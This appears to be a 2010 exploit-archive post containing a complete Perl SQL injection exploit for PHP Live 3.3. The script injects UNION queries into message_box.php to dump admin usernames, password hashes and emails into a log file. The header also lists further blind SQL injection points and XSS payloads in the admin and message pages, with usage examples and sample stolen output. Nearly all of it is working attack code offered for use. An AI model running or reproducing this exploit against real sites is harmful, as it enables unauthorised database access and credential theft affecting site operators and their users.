PHP Live 3.3 Remote SQL Injection Exploit
Posted on 01 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP Live 3.3 Remote SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= PHP Live 3.3 Remote SQL Injection Exploit ========================================= #!/usr/bin/perl -w ############################################################################ # # Exploit Title: PHP Live 3.3 # Date: 01/08/2010 # Author: TA4G - S8T@hotmail.com # Vendor: phplivesupport.com # Version: 3.3 # Google dork : n/a # Platform / Tested on: windows 7 # Category: webapps/0day # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST _ Sn!p3r_P4L # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Gr33tz to ### ArHack.NeT ### # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Usage: exploit.pl &lt;page&gt; &lt;path&gt; &lt;valid user&gt; # Example: perl exploit.pl http://site.com phplive TA4G # # path and username are optional. You can set them to &#039;no&#039; if you dont # know any information, or remove this parameters like: # # perl exploit.pl http://site.com no adalbert # perl exploit.pl http://site.com # perl exploit.pl http://site.com no no # ########################################################################### # # Other bugs in: # /phplive/admin/index.php?sid=[sid]&amp;deptid=1+[SQL BLIND INJECTION] # /phplive/request.php?l=admin&amp;x=1+[SQL BLIND INJECTION] # # /phplive/admin/index.php?sid=1[sid]&amp;deptid=&amp;search_string=&quot;&gt;&lt;Script&gt;alert(1)&lt;/Script&gt; # /phplive/message_box.php?theme=&amp;l=admin&amp;x=1&amp;deptid=1&quot;&gt;&lt;Script&gt;alert(1)&lt;/Script&gt; # ########################################################################### # # Demonstration: # # perl exploit.pl http://site.com phplive no # ... # &gt;-------Exploit Intro-------&lt; # ----------------------------- # Logging: # ----------------------------- #[*] Vulnerable: Yes #[*] Injecting: Done #[*] ----------- #[*] Userdata: # # bla:hashashashashash:S8T@hotmail.com # admin:hashashashasha:admin@TA4G.com # #[*] Writing logfile #[*] Exit # # ############################################################################ # Setting crappy vars use LWP::Simple; $link = shift or die(&quot; Read the fuckn manual &quot;); $path = shift or $path = &#039;/phplive&#039;; $user = shift or $user = &#039;admin&#039;; $link = &#039;http://&#039;.$link if($link !~ /^http:///); $add = &#039;/message_box.php?theme=&amp;l=&#039;.$user.&#039;&amp;x=1&amp;deptid=-1&#039;; ($pw,$count) = (0x37635345,0); #*********** Baby protection ************# print &quot;Please insert anti-baby-code:&quot;; $baby = &lt;STDIN&gt;; die &quot; wait a few years please... &quot; if ($pw != $baby); intro(); print &quot; LOGGING: ---------------------------------------- &quot;; #*********** Vulnerable-Check ************# $resp = get($link.&#039;/&#039;.$path.$add.&#039;+union+(select+1&#039;.&#039;,1&#039;x14 .&#039;,777777777,1,1)-- -&#039;); ($resp =~ m/&lt;p&gt;777777777&lt;/p&gt;/i) ? print &quot;[*] Vulnerable: Yes [*] Injecting: Done [*] -------------- &quot; : die(&quot;[*] Vulnerable: No [*] Exit &quot;); #*********** Injecting Nanobots ***********# print &quot;[*] Userdata: &quot;; $infostring = &#039;concat_ws(0x3a,777777,version(),login,password,email)&#039;; while(1) { $resp = get($link.&quot;/&quot;.$path.$add.&quot;+union+(select+1&quot;.&quot;,1&quot;x14 .&quot;,&quot;.$infostring.&quot;,0,0+from+chat_admin+limit+&quot;.$count.&quot;,1)-- -&quot;); $resp =~ m/777777:(.*)&lt;/p&gt;/i or last; @temp = split(&quot;:&quot;,$1); push(@data,($temp[1].&quot;:&quot;.$temp[2].&quot;:&quot;.$temp[3])); print $temp[1].&quot;:&quot;.$temp[2].&quot;:&quot;.$temp[3].&quot; &quot;; $count++; } #*********** Write2file *****************# $text = &quot;[TA4G] [PHP Live 3.3] SQL Injection Exploit: [*] Link: &quot;.$link.&quot;/&quot;.$path.$add.&quot; &quot;. &quot;[*] mySQL Version: &quot;.substr($temp[0],0,3).&quot; [*] Userdata: &quot;; open(LULZ,&quot;&gt;&gt;log.txt&quot;); print LULZ $text; foreach(@data) {print LULZ $_.&quot; &quot;;} close LULZ; print &quot; [*] Writing Logfile [*] Exit &quot;; #************ Leet intro **************# sub intro { print q { --------------------------------------- *************************************** * * [PHP Live 3.3] SQL Injection Exploit * written by TA4G * ----------- * Usage: exploit.pl &lt;url&gt; &lt;path&gt; &lt;user&gt; * * path and user are optional * *************************************** --------------------------------------- }; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
